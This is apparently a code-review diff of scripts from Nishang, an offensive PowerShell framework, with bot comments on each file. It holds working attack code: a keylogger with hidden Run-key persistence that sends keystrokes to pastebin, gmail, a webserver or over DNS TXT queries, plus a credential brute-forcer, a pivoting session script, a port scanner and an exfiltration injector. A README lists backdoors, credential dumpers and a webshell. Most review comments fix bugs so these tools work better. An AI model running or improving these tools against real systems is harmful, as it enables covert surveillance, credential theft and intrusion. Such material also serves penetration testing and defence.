$utfbytes = [System.Text.Encoding]::UTF8.GetBytes($Data)
$pastevalue = [System.Convert]::ToBase64String($utfbytes)
post_http "https://pastebin.com/api/api_login.php" "api_dev_key=$dev_key&api_user_name=$username&api_user_password=$password"
post_http "https://pastebin.com/api/api_post.php" "api_user_key=$session_key&api_option=paste&api_dev_key=$dev_key&api_paste_name=$pastename&api_paste_code=$pastevalue&api_paste_private=2"
}
elseif ($exfiloption -eq "gmail")
{
#http://stackoverflow.com/questions/1252335/send-mail-via-gmail-with-powershell-v2s-send-mailmessage
$smtpserver = smtp.gmail.com
$msg = new-object Net.Mail.MailMessage
$smtp = new-object Net.Mail.SmtpClient($smtpServer )
$smtp.EnableSsl = $True
$smtp.Credentials = New-Object System.Net.NetworkCredential($username, $password);
$msg.From = $username@gmail.com
$msg.To.Add($username@gmail.com)
$msg.Subject = $pastename
$msg.Body = $pastevalue
if ($filename)
{
$att = new-object Net.Mail.Attachment($filename)
$msg.Attachments.Add($att)
}
$smtp.Send($msg)
}
elseif ($exfiloption -eq "webserver")
{
$Data = Compress-Encode
post_http $URL $Data
}
elseif ($ExfilOption -eq "DNS")
{
$code = Compress-Encode
$lengthofsubstr = 0
$queries = [int]($code.Length/63)
while ($queries -ne 0)
{
$querystring = $code.Substring($lengthofsubstr,63)
Invoke-Expression "nslookup -querytype=txt $querystring.$DomaName $AuthNS"
$lengthofsubstr += 63
$queries -= 1
}
$mod = $code.Length%63
$query = $code.Substring($code.Length - $mod, $mod)
Invoke-Expression "nslookup -querytype=txt $query.$DomainName $AuthNS"
}
$check++
if ($check -eq 6000)
{
$check = 0
$webclient = New-Object System.Net.WebClient
$filecontent = $webclient.DownloadString("$CheckURL")
if ($filecontent -eq $MagicString)
{
break
}
}
}
}
}
$modulename = $script:MyInvocation.MyCommand.Name
if($persist -eq $True)
{
$name = "persist.vbs"
$options = "start-job -InitializationScript `$functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)"
$options2 = "start-job -InitializationScript `$functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)"
$func = $functions.Tostring()
Out-File -InputObject '$functions = {' -Force $env:TEMP\$modulename
Out-File -InputObject $func -Append $env:TEMP\$modulename
Out-File -InputObject '}' -Append -NoClobber $env:TEMP\$modulename
Out-File -InputObject $options -Append -NoClobber $env:TEMP\$modulename
Out-File -InputObject $options2 -Append -NoClobber $env:TEMP\$modulename
New-ItemProperty -Path HKCU:Software\Microsoft\Windows\CurrentVersion\Run\ -Name Update -PropertyType String -Value $env:TEMP\$name -force
echo "Set objShell = CreateObject(`"Wscript.shell`")" > $env:TEMP\$name
echo "objShell.run(`"powershell -noexit -WindowStyle Hidden -executionpolicy bypass -file $env:temp\$modulename`")" >> $env:TEMP\$name
}
else
{
if ($exfil -eq $True)
{
start-job -InitializationScript $functions -scriptblock {Keypaste $args[0] $args[1] $args[2] $args[3] $args[4] $args[5] $args[6] $args[7]} -ArgumentList @($ExfilOption,$dev_key,$username,$password,$URL,$AuthNS,$MagicString,$CheckURL)
start-job -InitializationScript $functions -scriptblock {Keylogger $args[0] $args[1]} -ArgumentList @($MagicString,$CheckURL)
}
else
{
Keylogger $MagicString $CheckURL
}
}
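Review bot: the third `.EXAMPLE`, `.\Keylogger.ps1 http://example.com stopthis -exfil <dev_key> <username> <pass> 3`, does not match the Param block: `-exfil` is a `[Switch]`, and positions 2 onward are `$ExfilOption` (ValidateSet gmail/pastebin/WebServer/DNS), `$dev_key`, `$username`, `$password`, `$URL`, `$DomainName`, `$AuthNS`, so the trailing `3` fails validation; rewrite the example with the actual positional order. `.PARAMETER persist` promises "different methods of persistence with Admin access and normal user access", but the code implements only one: a `HKCU:Software\Microsoft\Windows\CurrentVersion\Run` value named `Update` pointing at `$env:TEMP\persist.vbs`, which launches a copy of the script from `%TEMP%`. The documentation should describe that single method, and it is worth noting in `.NOTES` that the Run value, `persist.vbs`, the copied `.ps1` and the plaintext `$env:temp\key.log` are the on-host artifacts a defender will find. Style: `$now = Get-Date` is computed on every keystroke in `Keylogger` and never used in the log line.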

@ -0,0 +1,31 @@
<#
.SYNOPSIS
Nishang Payload to which "speaks" the given sentence
.DESCRIPTION
This payload uses the Speech API and the given senetence
is spoken in the MS Narrator's voice.
.PARAMETER Sentence
The sentence to be spoken
.EXAMPLE
PS > Speak <senetence>
.LINK
http://labofapenetrationtester.blogspot.com/
https://github.com/samratashok/nishang
#>
function Speak
{
Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$Sentence
)
(new-object -com SAPI.SpVoice).speak("$Sentence")
}
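Review bot: help-text typos that `Get-Help` renders verbatim: `Payload to which "speaks"` should read `Payload which "speaks"`, and `senetence` appears in both `.DESCRIPTION` and `.EXAMPLE`.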

@ -0,0 +1,104 @@
<#
.SYNOPSIS
Nishang script which can check for credentials on remote computers and can open PSSessions if the credentials work.
.DESCRIPTION
The payload uses WMI to check a credential against given list of computers. Use the -Creds parameter to specify username and password. If the script is run
from a powershell session with local or global admin credentials (or from a powershell session started with hashes of such account using WCE), it should be used
without the -Creds parameter. Use the -CreateSessions parameter to create PSSessions.
.PARAMETER filename
Path to the file which stores list of servers.
.PARAMETER Creds
Use this parameter to specify username (in form of domain\username) and password.
.PARAMETER CreateSessions
Use this parameter to make the script create PSSessions to targets on which the credentials worked.
.PARAMETER VerboseErrors
Use this parameter to get verbose error messages.
.EXAMPLE
PS > Create-MultipleSessions -filename .\servers.txt
Above command uses the credentials available with current powershell session and checks it against multiple computers specified in servers.txt
.EXAMPLE
PS > Create-MultipleSessions -filename .\servers.txt -Creds
Above command asks the user to provide username and passowrd to check on remote computers.
.EXAMPLE
PS > Create-MultipleSessions -filename .\servers.txt -CreateSessions
Above command uses the credentials available with current powershell session, checks it against multiple computers specified in servers.txt and creates PSSession for those.
.LINK
http://labofapenetrationtester.blogspot.com/2013/04/poshing-the-hashes.html
https://github.com/samratashok/nishang
#>
function Create-MultipleSessions
{
[CmdletBinding()] Param (
[Parameter(Position = 0, Mandatory = $True)]
[String]
$filename,
[Parameter(Mandatory = $False)]
[Switch]
$Creds,
[Parameter(Mandatory = $False)]
[Switch]
$CreateSessions,
[Parameter(Mandatory = $False)]
[Switch]
$VerboseErrors
)
$ErrorActionPreference = "SilentlyContinue"
if ($VerboseErrors)
{
$ErrorActionPreference = "Continue"
}
$servers = Get-Content $filename
if ($Creds)
{
$Credentials = Get-Credential
$CheckCommand = 'gwmi -query "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True" -ComputerName $server -Credential $Credentials'
$SessionCommand = 'New-PSSession -ComputerName $server -Credential $Credentials'
}
else
{
$CheckCommand = 'gwmi -query "Select IPAddress From Win32_NetworkAdapterConfiguration Where IPEnabled = True" -ComputerName $server'
$SessionCommand = 'New-PSSession -ComputerName $server'
}
foreach ($server in $servers)
{
$check = Invoke-Expression $CheckCommand
if($check -ne $null)
{
Write-Host "Credentials worked on $server !!" -ForegroundColor Green
if ($CreateSessions -eq $True)
{
"`nCreating Session for $server"
Invoke-Expression $SessionCommand
}
}
else
{
"Could not connect or credentials didn't work on $server"
}
}
if ($CreateSessions -eq $True)
{
Write-Host "`nFollowing Sessions have been created: " -ForegroundColor Green
Get-PSSession
}
}
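Review bot: `Invoke-Expression $CheckCommand` and `Invoke-Expression $SessionCommand` are not needed; the only difference between the two branches is whether `-Credential $Credentials` is present, which is what splatting is for: `$opt = @{ComputerName = $server}; if ($Creds) { $opt.Credential = $Credentials }; gwmi -Query "Select IPAddress From ..." @opt`. That removes string evaluation and keeps the code analysable. Results are also emitted inconsistently: success goes to `Write-Host` in green, while `Could not connect ...` and `Creating Session for ...` go to the output stream as plain strings, so a caller piping the function gets neither a result object nor a clean log; return one object per server (ComputerName, Success, Session) or write both outcomes to the same stream. `passowrd` in the second `.EXAMPLE`.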

@ -0,0 +1,122 @@
#Requires -Version 3
<#
.SYNOPSIS
Nishang script which checks running processes for malwares.
.DESCRIPTION
This script uses takes md5 hashes of running processes (the correspondibg executable)
on the target system and search the hashes in the Virustotal database using the Public API.
.PARAMETER APIKEY
THe APIKEY provided when someone registers to virustotal
.EXAMPLE
PS > Prasadhak 1fe0ef5feca2f84eb450bc3617f839e317b2a686af4d651a9bada77a522201b0
.LINK
http://www.labofapenetrationtester.com/2013/01/introducing-prasadhak.html
https://github.com/samratashok/nishang
.Notes
The word Prasadhak means purifier in Sanskrit language.
#>
function Prasadhak
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True)]
[String]
$apikey
)
function post_http($url,$parameters)
{
$http_request = New-Object -ComObject Msxml2.XMLHTTP
$http_request.open("POST", $url, $false)
$http_request.setRequestHeader("Content-type","application/x-www-form-urlencoded")
$http_request.setRequestHeader("Content-length", $parameters.length);
$http_request.setRequestHeader("Connection", "close")
$http_request.send($parameters)
$script:response = $http_request.responseText
}
function check
{
$res = $response | ConvertFrom-JSON
foreach ($code in $res)
{
#$proc1[$track]
if ($code.response_code -eq 0)
{
Write-Host "Not found in VT database. " #+ $proc1[$track]
}
elseif (($code.response_code -eq 1) -and ($code.positives -ne 0))
{
Write-Host "Something malicious is found. " -ForegroundColor Red # $proc1[$track]
$code.Permalink
}
elseif (($code.response_code -eq 1))
{
Write-Host "This is reported clean. " -ForegroundColor Green # $proc1[$track]
}
elseif ($res.response_code -eq -2)
{
"File queued for analysis. " #+ $proc1[$track]
$code.Permalink
}
#$track++
}
}
$ErrorActionPreference = "SilentlyContinue"
$iteration = 0
$count = 0
$reqcount = 0
[String[]]$hash = @()
#[String[]]$procname = @()
"Reading Processes and determining executables."
Start-Sleep -Seconds 3
$procs = (Get-Process).path
$procnumber = Get-Process | Measure-Object -line
"Total Processes detected: " + $procnumber.lines
"Total Processes for which executables were detected: " + $procs.length
Start-Sleep -Seconds 3
foreach ($proc in $procs)
{
$md5 = new-object -TypeName System.Security.Cryptography.MD5CryptoServiceProvider #http://stackoverflow.com/questions/10521061/how-to-get-a-md5-checksum-in-powershell
$hash = $hash + "," + [System.BitConverter]::ToString($md5.ComputeHash([System.IO.File]::ReadAllBytes($proc))).Replace("-", "").ToLower()
#$procname = $procname + $proc
if ((($count -eq 25) -and (($procs.length - 25) -ge 0)) -or ($procs.Length -lt 25) -or (($iteration -ge 1) -and ((($procs.length - (25 * $iteration)) - 1) -eq $count)))
{
Post_http "https://www.virustotal.com/vtapi/v2/file/report" "resource=$hash&apikey=$apikey"
check
$hash = 0
$count = 0
$reqcount++
$iteration++
}
if ($reqcount -eq 4)
{
"Waiting for one minute as VT allows only 4 requests per minute."
Start-Sleep -seconds 60
$reqcount = 0
}
$count++
}
}
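Review bot: `[String[]]$hash = @()` followed by `$hash = $hash + "," + <md5>` appends array elements instead of building a comma-separated string, so `"resource=$hash&apikey=$apikey"` interpolates them space-joined (` , <md5> , <md5>`), and because of the `[String[]]` constraint `$hash = 0` leaves a stray `"0"` element at the front of the next batch; accumulate into a plain `[string]` or collect hashes in a list and `-join ','` when posting. `$ErrorActionPreference = "SilentlyContinue"` also swallows `ReadAllBytes` failures on protected or transient processes, so `$procs.length` overstates the number of hashes computed and the batch condition at `if ((($count -eq 25) ...`, which is driven by `$procs.length` and `$iteration`, can skip the final partial batch; count hashes actually produced instead. In `check`, the last branch tests `$res.response_code` while the others test `$code.response_code`. Help-text typos: `uses takes`, `correspondibg`, `THe APIKEY`.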

aspx/nishang/README.md Normal file (201 lines)

@ -0,0 +1,201 @@
#Nishang
###Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security usage and during Penetraion Tests. Nishang is useful during various phases of a penetration test and is most powerful for post exploitation usage.
####Scripts
Nishang currently contains following scripts and payloads.
#####Antak - the Webshell
[Antak](https://github.com/samratashok/nishang/tree/master/Antak-WebShell)
Execute powershell scripts in-memory, commands, download and upload files using this webshell.
#####Backdoors
[HTTP-Backdoor](https://github.com/samratashok/nishang/blob/master/Backdoors/HTTP-Backdoor.ps1)
A backdoor which is capable to recieve instructions from third party websites and could execute powershell scripts in memory.
[DNS_TXT_Pwnage](https://github.com/samratashok/nishang/blob/master/Backdoors/DNS_TXT_Pwnage.ps1)
A Backdoor which could recieve commands and powershell scripts from DNS TXT queries and execute those on target and could be controlled remotely using the queries.
[Execute-OnTime](https://github.com/samratashok/nishang/blob/master/Backdoors/Execute-OnTime.ps1)
A Backdoor which could execute powershell scripts on a given time on a target.
#####Escalation
[Enable-DuplicateToken](https://github.com/samratashok/nishang/blob/master/Escalation/Enable-DuplicateToken.ps1)
When SYSTEM privileges are required.
[Remove-Update](https://github.com/samratashok/nishang/blob/master/Escalation/Remove-Update.ps1)
Introduce vulnerabilites by removing patches.
#####Execution
[Download-Execute-PS](https://github.com/samratashok/nishang/blob/master/Execution/Download-Execute-PS.ps1)
Download and execute a powershell script in memory.
[Download_Execute](https://github.com/samratashok/nishang/blob/master/Execution/Download_Execute.ps1)
Download an executable in text format, convert to executable and execute.
[Execute-Command-MSSQL](https://github.com/samratashok/nishang/blob/master/Execution/Execute-Command-MSSQL.ps1)
Run powershell commands, native commands or SQL commands on a MSSQL Server with sufficient privileges.
[Execute-DNSTXT-Code](https://github.com/samratashok/nishang/blob/master/Execution/Execute-DNSTXT-Code.ps1)
Execute shellcode in memeory using DNS TXT queries.
#####Gather
[Check-VM](https://github.com/samratashok/nishang/blob/master/Gather/Check-VM.ps1)
Check for Virtual Machine
[Copy-VSS](https://github.com/samratashok/nishang/blob/master/Gather/Copy-VSS.ps1)
Copy the SAM file using Volume Shadow Service.
[Credentials](https://github.com/samratashok/nishang/blob/master/Gather/Credentials.ps1)
Fool a user to give credentials in plain text.
[FireBuster](https://github.com/samratashok/nishang/blob/master/Gather/FireBuster.ps1)
[FireListener](https://github.com/samratashok/nishang/blob/master/Gather/FireListener.ps1)
A pair of scripts for Egress Testing
[Get-Information](https://github.com/samratashok/nishang/blob/master/Gather/Get-Information.ps1)
Get juicy information from a target.
[Get-LSASecret](https://github.com/samratashok/nishang/blob/master/Gather/Get-LSASecret.ps1)
Get LSA Secret from a target.
[Get-PassHashes](https://github.com/samratashok/nishang/blob/master/Gather/Get-PassHashes.ps1)
Get password hashes from a target.
[Get-WLAN-Keys](https://github.com/samratashok/nishang/blob/master/Gather/Get-WLAN-Keys.ps1)
Get WLAN keys in plain from a target.
[Keylogger](https://github.com/samratashok/nishang/blob/master/Gather/Keylogger.ps1)
Log keys from a target.
#####Pivot
[Create-MultipleSessions](https://github.com/samratashok/nishang/blob/master/Pivot/Create-MultipleSessions.ps1)
Check credentials on multiple computers and create PSSessions.
[Run-EXEonRemote](https://github.com/samratashok/nishang/blob/master/Pivot/Run-EXEonRemote.ps1)
Copy and execute an executable on multiple machines.
#####Prasadhak
[Prasadhak](https://github.com/samratashok/nishang/blob/master/Prasadhak/Prasadhak.ps1)
Check running hashes of running process against Virus Total database.
#####Scan
[Brute-Force](https://github.com/samratashok/nishang/blob/master/Scan/Brute-Force.ps1)
Brute force FTP, Active Directory, MS SQL Server and Sharepoint.
[Port-Scan](https://github.com/samratashok/nishang/blob/master/Scan/Port-Scan.ps1)
A handy port scanner.
#####Powerpreter
[Powerpreter](https://github.com/samratashok/nishang/tree/master/powerpreter)
All the functionality of nishang in a single script module.
#####Utility
[Add-Exfiltration](https://github.com/samratashok/nishang/blob/master/Utility/Add-Exfiltration.ps1)
Add data exfiltration capability to gmail,pastebin, webserver and DNS to any script.
[Add-Persistence](https://github.com/samratashok/nishang/blob/master/Utility/Add-Persistence.ps1)
Add Reboot persistence capability to a script.
[Remove-Persistence](https://github.com/samratashok/nishang/blob/master/Utility/Remove-Persistence.ps1)
Remoce persistence added by the Add-Persistence script.
[Do-Exfiltration](https://github.com/samratashok/nishang/blob/master/Utility/Do-Exfiltration.ps1)
Pipe (|) this to any script to exfiltrate the output.
[Download](https://github.com/samratashok/nishang/blob/master/Utility/Download.ps1)
Download a file to the target.
[Parse_Keys](https://github.com/samratashok/nishang/blob/master/Utility/Parse_Keys.ps1)
Parse keys logged by the Keylogger.
[Invoke-Encode](https://github.com/samratashok/nishang/blob/master/Utility/Invoke-Decode.ps1)
Encode and Compress a script or string.
[Invoke-Decode](https://github.com/samratashok/nishang/blob/master/Utility/Invoke-Decode.ps1)
Decode and Decompress a script or string from Invoke-Encode.
[Base64ToString]
[StringToBase64]
[ExetoText]
[TexttoExe]
####Usage
Use the individual scripts with dot sourcing
PS > . .\Get-Information
PS > Get-Information
To get help about any script or payload, use
PS > Get-Help [scriptname.ps1] -full
Import all the scripts in current powershell session
PS > Import-Module .\nishang.psm1
####Updates
Updates about Nishang could be found at my blog http://labofapenetrationtester.com/ and my twitter feed @nikhil_mitt
####Bugs, Feedback and Feature Requests
Please raise an issue if you encounter a bug or have a feature request or mail me at nikhil [dot] uitrgpv at gmail.com
#####Mailing List
For feedback, discussions and feature requests join http://groups.google.com/group/nishang-users
#####Contributing
I am always looking for contributors to Nishang. Please submit requests or drop me email.
#####Blog Posts
Some blog posts to check out for beginners:
http://www.labofapenetrationtester.com/2014/06/nishang-0-3-4.html
http://labofapenetrationtester.com/2012/08/introducing-nishang-powereshell-for.html
http://labofapenetrationtester.com/2013/08/powerpreter-and-nishang-Part-1.html
http://www.labofapenetrationtester.com/2013/09/powerpreter-and-nishang-Part-2.html
All posts about Nishang:
http://www.labofapenetrationtester.com/search/label/Nishang
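Review bot: the `[Invoke-Encode]` entry links to `Utility/Invoke-Decode.ps1`; it should point at `Utility/Invoke-Encode.ps1`. The four bare entries `[Base64ToString]`, `[StringToBase64]`, `[ExetoText]`, `[TexttoExe]` have neither a URL nor a one-line description, unlike every other script listed. Headings are written without a space after the hashes (`#Nishang`, `####Scripts`, `#####Backdoors`), which CommonMark and several renderers treat as plain text, and the entire framework description is an h3; use `# Nishang`, `## Scripts`, `### Backdoors` and make the description a paragraph. Spelling: `Penetraion`, `recieve` (twice), `vulnerabilites`, `memeory`, `Remoce`; `powereshell` appears inside the 2012 blog URL, so confirm that link resolves as written before touching it.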

@ -0,0 +1,162 @@
<#
.SYNOPSIS
Nishang payload which performs a Brute-Force Attack against SQL Server, Active Directory, Web and FTP.
.DESCRIPTION
This payload tries to login to SQL, ActiveDirectory, Web or FTP using a specific account and password.
You can also specify a password-list as input as shown in the Example section.
.PARAMETER Identity
Specifies a SQL Server, FTP Site or Web Site.
.PARAMETER UserName
Specifies a UserName. If blank, trusted connection will be used for SQL and anonymous access will be used for FTP.
.PARAMETER Password
Specifies a Password.
.PARAMETER Service
Enter a Service. Default service is set to SQL.
.EXAMPLE
PS > Brute-Force -Identity SRV01 -UserName sa -Password ""
.EXAMPLE
PS > Brute-Force -Identity ftp://SRV01 -UserName sa -Password "" -Service FTP
.EXAMPLE
PS > "SRV01","SRV02","SRV03" | Brute-Force -UserName sa -Password sa
.EXAMPLE
PS > Import-CSV .\username.txt | Brute-Force -Identity targetdomain -Password Password1 -Service ActiveDirectory
.EXAMPLE
PS > Brute-Force -Identity "http://www.something.com" -UserName user001 -Password Password1 -Service Web
.LINK
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/03/use-powershell-to-security-test-sql-server-and-sharepoint.aspx
https://github.com/samratashok/nishang
.NOTES
Goude 2012, TreuSec
#>
function Brute-Force {
[CmdletBinding()] Param(
[Parameter(Mandatory = $true, Position = 0, ValueFromPipeLineByPropertyName = $true)]
[Alias("PSComputerName","CN","MachineName","IP","IPAddress","ComputerName","Url","Ftp","Domain","DistinguishedName")]
[string]
$Identity,
[parameter(Position = 1, ValueFromPipeLineByPropertyName = $true)]
[string]
$UserName,
[parameter(Position = 2, ValueFromPipeLineByPropertyName = $true)]
[string]
$Password,
[parameter(Position = 3)] [ValidateSet("SQL","FTP","ActiveDirectory","Web")]
[string]
$Service = "SQL"
)
Process {
if($service -eq "SQL") {
$Connection = New-Object System.Data.SQLClient.SQLConnection
if($userName) {
$Connection.ConnectionString = "Data Source=$identity;Initial Catalog=Master;User Id=$userName;Password=$password;"
} else {
$Connection.ConnectionString = "server=$identity;Initial Catalog=Master;trusted_connection=true;"
}
Try {
$Connection.Open()
$success = $true
}
Catch {
$success = $false
}
if($success -eq $true) {
$message = switch($connection.ServerVersion) {
{ $_ -match "^6" } { "SQL Server 6.5";Break }
{ $_ -match "^6" } { "SQL Server 7";Break }
{ $_ -match "^8" } { "SQL Server 2000";Break }
{ $_ -match "^9" } { "SQL Server 2005";Break }
{ $_ -match "^10\.00" } { "SQL Server 2008";Break }
{ $_ -match "^10\.50" } { "SQL Server 2008 R2";Break }
Default { "Unknown" }
}
} else {
$message = "Unknown"
}
} elseif($service -eq "FTP") {
if($identity -notMatch "^ftp://") {
$source = "ftp://" + $identity
} else {
$source = $identity
}
try {
$ftpRequest = [System.Net.FtpWebRequest]::Create($source)
$ftpRequest.Method = [System.Net.WebRequestMethods+Ftp]::ListDirectoryDetails
$ftpRequest.Credentials = new-object System.Net.NetworkCredential($userName, $password)
$result = $ftpRequest.GetResponse()
$message = $result.BannerMessage + $result.WelcomeMessage
$success = $true
} catch {
$message = $error[0].ToString()
$success = $false
}
} elseif($service -eq "ActiveDirectory") {
Add-Type -AssemblyName System.DirectoryServices.AccountManagement
$contextType = [System.DirectoryServices.AccountManagement.ContextType]::Domain
Try {
$principalContext = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($contextType, $identity)
$success = $true
}
Catch {
$message = "Unable to contact Domain"
$success = $false
}
if($success -ne $false) {
Try {
$success = $principalContext.ValidateCredentials($username, $password)
$message = "Password Match"
}
Catch {
$success = $false
$message = "Password doesn't match"
}
}
} elseif($service -eq "Web") {
if($identity -notMatch "^(http|https)://") {
$source = "http://" + $identity
} else {
$source = $identity
}
$webClient = New-Object Net.WebClient
$securePassword = ConvertTo-SecureString -AsPlainText -String $password -Force
$credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList $userName, $securePassword
$webClient.Credentials = $credential
Try {
$message = $webClient.DownloadString($source)
$success = $true
}
Catch {
$success = $false
$message = "Password doesn't match"
}
}
# Return Object
New-Object PSObject -Property @{
ComputerName = $identity;
UserName = $username;
Password = $Password;
Success = $success;
Message = $message
} | Select-Object Success, Message, UserName, Password, ComputerName
}
}
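Review bot: the SQL version `switch` tests `$_ -match "^6"` twice, so the `"SQL Server 7"` branch is unreachable; the second pattern should be `"^7"`. In the ActiveDirectory branch `$message = "Password Match"` is set unconditionally right after `$success = $principalContext.ValidateCredentials($username, $password)`, so a failed validation returns `Success = $false` together with a message claiming a match; derive the message from `$success`. The returned object also carries the cleartext `Password` property, which ends up in transcripts and any output capture; consider emitting it only when `Success` is true. Minor: `.NOTES` says "TreuSec" while the `.LINK` points at truesec.com.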

@ -0,0 +1,131 @@
<#
.SYNOPSIS
Nihsang payload which Scan IP-Addresses, Ports and HostNames
.DESCRIPTION
Scan for IP-Addresses, HostNames and open Ports in your Network.
.PARAMETER StartAddress
StartAddress Range
.PARAMETER EndAddress
EndAddress Range
.PARAMETER ResolveHost
Resolve HostName
.PARAMETER ScanPort
Perform a PortScan
.PARAMETER Ports
Ports That should be scanned, default values are: 21,22,23,53,69,71,80,98,110,139,111,
389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,
5801,5900,5555,5901
.PARAMETER TimeOut
Time (in MilliSeconds) before TimeOut, Default set to 100
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.0.254 -ResolveHost -ScanPort -TimeOut 500
.EXAMPLE
PS > Port-Scan -StartAddress 192.168.0.1 -EndAddress 192.168.10.254 -ResolveHost -ScanPort -Port 80
.LINK
http://www.truesec.com
http://blogs.technet.com/b/heyscriptingguy/archive/2012/07/02/use-powershell-for-network-host-and-port-discovery-sweeps.aspx
https://github.com/samratashok/nishang
.NOTES
Goude 2012, TrueSec
#>
function Port-Scan {
[CmdletBinding()] Param(
[parameter(Mandatory = $true, Position = 0)]
[ValidatePattern("\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")]
[string]
$StartAddress,
[parameter(Mandatory = $true, Position = 1)]
[ValidatePattern("\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b")]
[string]
$EndAddress,
[switch]
$ResolveHost,
[switch]
$ScanPort,
[int[]]
$Ports = @(21,22,23,53,69,71,80,98,110,139,111,389,443,445,1080,1433,2001,2049,3001,3128,5222,6667,6868,7777,7878,8080,1521,3306,3389,5801,5900,5555,5901),
[int]
$TimeOut = 100
)
Begin {
$ping = New-Object System.Net.Networkinformation.Ping
}
Process {
foreach($a in ($StartAddress.Split(".")[0]..$EndAddress.Split(".")[0])) {
foreach($b in ($StartAddress.Split(".")[1]..$EndAddress.Split(".")[1])) {
foreach($c in ($StartAddress.Split(".")[2]..$EndAddress.Split(".")[2])) {
foreach($d in ($StartAddress.Split(".")[3]..$EndAddress.Split(".")[3])) {
write-progress -activity PingSweep -status "$a.$b.$c.$d" -percentcomplete (($d/($EndAddress.Split(".")[3])) * 100)
$pingStatus = $ping.Send("$a.$b.$c.$d",$TimeOut)
if($pingStatus.Status -eq "Success") {
if($ResolveHost) {
write-progress -activity ResolveHost -status "$a.$b.$c.$d" -percentcomplete (($d/($EndAddress.Split(".")[3])) * 100) -Id 1
$getHostEntry = [Net.DNS]::BeginGetHostEntry($pingStatus.Address, $null, $null)
}
if($ScanPort) {
$openPorts = @()
for($i = 1; $i -le $ports.Count;$i++) {
$port = $Ports[($i-1)]
write-progress -activity PortScan -status "$a.$b.$c.$d" -percentcomplete (($i/($Ports.Count)) * 100) -Id 2
$client = New-Object System.Net.Sockets.TcpClient
$beginConnect = $client.BeginConnect($pingStatus.Address,$port,$null,$null)
if($client.Connected) {
$openPorts += $port
} else {
# Wait
Start-Sleep -Milli $TimeOut
if($client.Connected) {
$openPorts += $port
}
}
$client.Close()
}
}
if($ResolveHost) {
$hostName = ([Net.DNS]::EndGetHostEntry([IAsyncResult]$getHostEntry)).HostName
}
# Return Object
New-Object PSObject -Property @{
IPAddress = "$a.$b.$c.$d";
HostName = $hostName;
Ports = $openPorts
} | Select-Object IPAddress, HostName, Ports
}
}
}
}
}
}
End {
}
}
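Review bot: the port probe inside `if($ScanPort)` never waits on the handle returned by `$client.BeginConnect(...)`: it reads `$client.Connected` immediately, sleeps `$TimeOut` and reads it once more, and `$beginConnect` is discarded without `EndConnect`, so a connect that completes slightly later is reported closed. Use `$beginConnect.AsyncWaitHandle.WaitOne($TimeOut)` and then check `$client.Connected`. The four nested `foreach` loops iterate each octet independently, so a range whose start octet exceeds the end octet (for example 192.168.0.100 to 192.168.1.50) produces a descending `100..50` instead of the addresses in between, and `-percentcomplete` is computed from the last octet only. Documentation: `.SYNOPSIS` reads "Nihsang", and the last `.EXAMPLE` passes `-Port 80` while the parameter is `-Ports`.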

@ -0,0 +1,188 @@
<#
.SYNOPSIS
Use this script to exfiltrate data from a target.
.DESCRIPTION
This script could be used to exfiltrate data from a target to gmail, pastebin, a webserver which could log POST requests
and a DNS Server which could log TXT queries. To decode the data exfiltrated by webserver and DNS methods use Invoke-Decode.ps1
in Utility folder of Nishang.
.PARAMETER Data
The data to be exfiltrated. Could be supplied by pipeline.
.PARAMETER ExfilOption
The method you want to use for exfitration of data. Valid options are "gmail","pastebin","WebServer" and "DNS".
.PARAMETER dev_key
The Unique API key provided by pastebin when you register a free account.
Unused for other options
.PARAMETER username
Username for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER password
Password for the pastebin/gmail account where data would be exfiltrated.
Unused for other options
.PARAMETER URL
The URL of the webserver where POST requests would be sent.
.PARAMETER DomainName
The DomainName, whose subdomains would be used for sending TXT queries to.
.PARAMETER AuthNS
Authoritative Name Server for the domain specified in DomainName
.EXAMPLE
PS > Add-Exfiltration -ScriptPath C:\Get-Information.ps1 -FilePath C:\test\Get-Information_exfil.ps1
PS > . .\Get-Information_exfil.ps1
PS > Get-Information | Do-Exfiltration -ExfilOption webserver -URL http://yourwebserver.com
The first command adds exfiltration to Get-Information.ps1 and writes it to Get-Information_exfil.ps1
The second command loads the generated Get-Information_exfil.ps1.
The third command runs the Get-Information function and pipes its output to the Do-Exfiltration function.
See the help of Do-Exfiltraion.ps1 to understand varios options for exfiltration.
.LINK
http://labofapenetrationtester.com/
https://github.com/samratashok/nishang
#>
function Add-Exfiltration
{
[CmdletBinding()] Param (
[Parameter(Position = 0, Mandatory = $True)]
[String]
$ScriptPath,
[Parameter(Position = 1, Mandatory = $True)]
[String]
$FilePath
)
$Exfiltration = @'
function Do-Exfiltration
{
[CmdletBinding()] Param(
[Parameter(Position = 0, Mandatory = $True, ValueFromPipeLine = $True)]
[String]
$Data,
[Parameter(Position = 1, Mandatory = $True)] [ValidateSet("gmail","pastebin","WebServer","DNS")]
[String]
$ExfilOption,
[Parameter(Position = 2, Mandatory = $False)]
[String]
$dev_key,
[Parameter(Position = 3, Mandatory = $False)]
[String]
$username,
[Parameter(Position = 4, Mandatory = $False)]
[String]
$password,
[Parameter(Position = 5, Mandatory = $False)]
[String]
$URL,
[Parameter(Position = 6, Mandatory = $False)]
[String]
$DomainName,
[Parameter(Position = 7, Mandatory = $False)]
[String]
$AuthNS
)
function post_http($url,$parameters)
{
